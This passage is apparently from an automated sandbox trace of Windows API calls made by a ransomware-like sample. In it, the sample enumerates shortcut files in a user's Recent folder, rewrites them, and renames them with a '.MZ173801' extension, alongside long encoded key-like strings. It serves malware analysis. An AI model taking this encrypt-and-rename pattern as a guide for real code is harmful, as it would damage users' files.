lpNumberOfBytesWritten=0x19f9bc*=0x277, lpOverlapped=0x0) returned 1 [0109.185] CloseHandle (hObject=0x3f4) returned 1 [0109.186] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H4CXj5T.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\h4cxj5t.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H4CXj5T.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\h4cxj5t.lnk.mz173801")) returned 1 [0109.363] GetCurrentThreadId () returned 0x1358 [0109.363] GetCurrentThreadId () returned 0x1358 [0109.363] GetCurrentThreadId () returned 0x1358 [0109.364] GetCurrentThreadId () returned 0x1358 [0109.364] GetCurrentThreadId () returned 0x1358 [0109.364] GetCurrentThreadId () returned 0x1358 [0109.364] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec2619b3, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec2619b3, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xec2619b3, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x348, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="hEI_tuSWJhfHIz05Nj8z.flv.lnk", cAlternateFileName="HEI_TU~1.LNK")) returned 1 [0109.364] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.364] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.364] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hEI_tuSWJhfHIz05Nj8z.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hei_tuswjhfhiz05nj8z.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec2619b3, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec2619b3, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xec2619b3, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x348)) returned 1 [0109.364] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.364] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.365] GetCurrentThreadId () returned 0x1358 [0109.365] GetCurrentThreadId () returned 0x1358 [0109.365] GetCurrentThreadId () returned 0x1358 [0109.365] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.365] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.365] GetCurrentThreadId () returned 0x1358 [0109.365] GetCurrentThreadId () returned 0x1358 [0109.365] GetCurrentThreadId () returned 0x1358 [0109.365] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hEI_tuSWJhfHIz05Nj8z.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hei_tuswjhfhiz05nj8z.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.365] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.365] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.366] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x348 [0109.366] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.366] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x348, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x348, lpOverlapped=0x0) returned 1 [0109.366] CloseHandle (hObject=0x3f4) returned 1 [0109.367] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hEI_tuSWJhfHIz05Nj8z.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hei_tuswjhfhiz05nj8z.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.367] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x348, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x348, lpOverlapped=0x0) returned 1 [0109.368] CloseHandle (hObject=0x3f4) returned 1 [0109.369] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hEI_tuSWJhfHIz05Nj8z.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hei_tuswjhfhiz05nj8z.flv.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hEI_tuSWJhfHIz05Nj8z.flv.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hei_tuswjhfhiz05nj8z.flv.lnk.mz173801")) returned 1 [0109.370] GetCurrentThreadId () returned 0x1358 [0109.370] GetCurrentThreadId () returned 0x1358 [0109.370] GetCurrentThreadId () returned 0x1358 [0109.370] GetCurrentThreadId () returned 0x1358 [0109.370] GetCurrentThreadId () returned 0x1358 [0109.370] GetCurrentThreadId () returned 0x1358 [0109.370] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec0e430d, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec0e430d, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xec0e430d, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x2f4, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="HPSq.lnk", cAlternateFileName="")) returned 1 [0109.370] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.370] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.370] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HPSq.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hpsq.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec0e430d, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec0e430d, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xec0e430d, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x2f4)) returned 1 [0109.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.371] GetCurrentThreadId () returned 0x1358 [0109.371] GetCurrentThreadId () returned 0x1358 [0109.371] GetCurrentThreadId () returned 0x1358 [0109.371] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.371] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdG